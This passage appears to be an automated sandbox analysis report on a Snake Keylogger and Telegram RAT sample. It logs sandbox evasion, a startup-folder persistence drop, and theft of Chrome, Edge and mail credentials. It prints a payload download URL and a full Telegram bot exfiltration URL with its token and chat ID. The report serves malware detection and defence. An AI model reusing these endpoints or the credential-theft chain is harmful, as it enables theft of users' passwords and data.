                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596591Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595032Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594907Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594782Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594063Jump to behavior
                Source: InstallUtil.exe, 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dcf8ffd3cd5362<
                Source: InstallUtil.exe, 00000001.00000002.4150876359.00000000031FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dcf9054f877039<
                Source: IsInvalid.exe, 00000004.00000002.1926811297.0000000003016000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                Source: IsInvalid.exe, 00000004.00000002.1926811297.0000000003016000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                Source: IsInvalid.exe, 00000004.00000002.1923540627.0000000001011000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                Source: InstallUtil.exe, 00000007.00000002.4147663712.0000000000669000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllina
                Source: Ndnownts.exe, 00000000.00000002.1740588716.0000000000864000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4147837835.00000000011CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B17B70 LdrInitializeThunk,7_2_04B17B70
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsInvalid.exe "C:\Users\user\AppData\Roaming\IsInvalid.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeQueries volume information: C:\Users\user\Desktop\Ndnownts.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeQueries volume information: C:\Users\user\AppData\Roaming\IsInvalid.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ndnownts.exe.3589550.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4150876359.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4150876359.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4151007876.00000000026CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4150876359.0000000003133000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4151007876.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4150876359.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Ndnownts.exe PID: 4544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: IsInvalid.exe PID: 3688, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 600, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 00000001.00000002.4150876359.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 600, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ndnownts.exe.3589550.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Ndnownts.exe PID: 4544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: IsInvalid.exe PID: 3688, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 600, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ndnownts.exe.3589550.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4150876359.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4150876359.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4151007876.00000000026CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4150876359.0000000003133000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4151007876.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4150876359.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Ndnownts.exe PID: 4544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: IsInvalid.exe PID: 3688, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 600, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 00000001.00000002.4150876359.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 600, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		Valid Accounts1
                Scheduled Task/Job                		111
                Scripting                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		11
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		21
                Obfuscated Files or Information                		Security Account Manager21
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron2
                Registry Run Keys / Startup Folder                		2
                Registry Run Keys / Startup Folder                		2
                Software Packing                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets31
                Virtualization/Sandbox Evasion                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion                		DCSync1
                System Network Configuration Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Process Injection                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545025 Sample: Ndnownts.exe_ Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 50 Multi AV Scanner detection for domain / URL 2->50 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 60 13 other signatures 2->60 8 Ndnownts.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 56 Tries to detect the country of the analysis system (by using the IP) 30->56 58 Uses the Telegram API (likely for C&C communication) 32->58 process4 dnsIp5 36 nexoproducciones.cl 190.107.177.80, 443, 49730, 49749 SOCCOMERCIALWIRENETCHILELTDACL Chile 8->36 24 C:\Users\user\AppData\Roaming\IsInvalid.exe, PE32 8->24 dropped 26 C:\Users\user\AppData\...\IsInvalid.vbs, ASCII 8->26 dropped 28 C:\Users\...\IsInvalid.exe:Zone.Identifier, ASCII 8->28 dropped 66 Drops VBS files to the startup folder 8->66 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->68 15 InstallUtil.exe 14 2 8->15         started        70 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->70 19 IsInvalid.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 38 api.telegram.org 149.154.167.220, 443, 49753, 49769 TELEGRAMRU United Kingdom 15->38 40 reallyfreegeoip.org 188.114.97.3, 443, 49732, 49733 CLOUDFLARENETUS European Union 15->40 42 checkip.dyndns.com 193.122.130.0, 49731, 49734, 49736 ORACLE-BMC-31898US United States 15->42 44 Tries to steal Mail credentials (via file / registry access) 15->44 46 Multi AV Scanner detection for dropped file 19->46 48 Machine Learning detection for dropped file 19->48 21 InstallUtil.exe 2 19->21         started        signatures10 process11 signatures12 62 Tries to steal Mail credentials (via file / registry access) 21->62 64 Tries to harvest and steal browser information (history, passwords, etc) 21->64

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Ndnownts.exe69%VirustotalBrowse
                Ndnownts.exe46%ReversingLabsByteCode-MSIL.Trojan.Generic
                Ndnownts.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\IsInvalid.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\IsInvalid.exe46%ReversingLabsByteCode-MSIL.Trojan.Generic

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                nexoproducciones.cl14%VirustotalBrowse
                reallyfreegeoip.org0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://checkip.dyndns.org/0%URL Reputationsafe
                https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                http://reallyfreegeoip.org0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                http://checkip.dyndns.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                nexoproducciones.cl
                		190.107.177.80
                		truefalseunknown
                reallyfreegeoip.org
                		188.114.97.3
                		truetrueunknown
                api.telegram.org
                		149.154.167.220
                		truetrue
                  		unknown
                  checkip.dyndns.com
                  		193.122.130.0
                  		truefalse
                    		unknown
                    checkip.dyndns.org
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendDocument?chat_id=6243598265&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snaketrue
                        		unknown
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        		unknown
                        https://reallyfreegeoip.org/xml/173.254.250.72false
                          		unknown
                          https://nexoproducciones.cl/Yinmwpj.pdftrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://github.com/mgravell/protobuf-netiNdnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmpfalse
                              		unknown
                              https://stackoverflow.com/q/14436606/23354Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1741258818.0000000002626000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000003016000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.orgInstallUtil.exe, 00000001.00000002.4150876359.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://github.com/mgravell/protobuf-netJNdnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		unknown
                                  https://api.telegram.org/botInstallUtil.exe, 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown
                                    https://api.telegram.org/bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendDocument?chat_id=6243InstallUtil.exe, 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://stackoverflow.com/q/11564914/23354;Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://stackoverflow.com/q/2152978/23354Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://reallyfreegeoip.org/xml/173.254.250.72$InstallUtil.exe, 00000001.00000002.4150876359.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003125000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000306C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003116000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002620000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 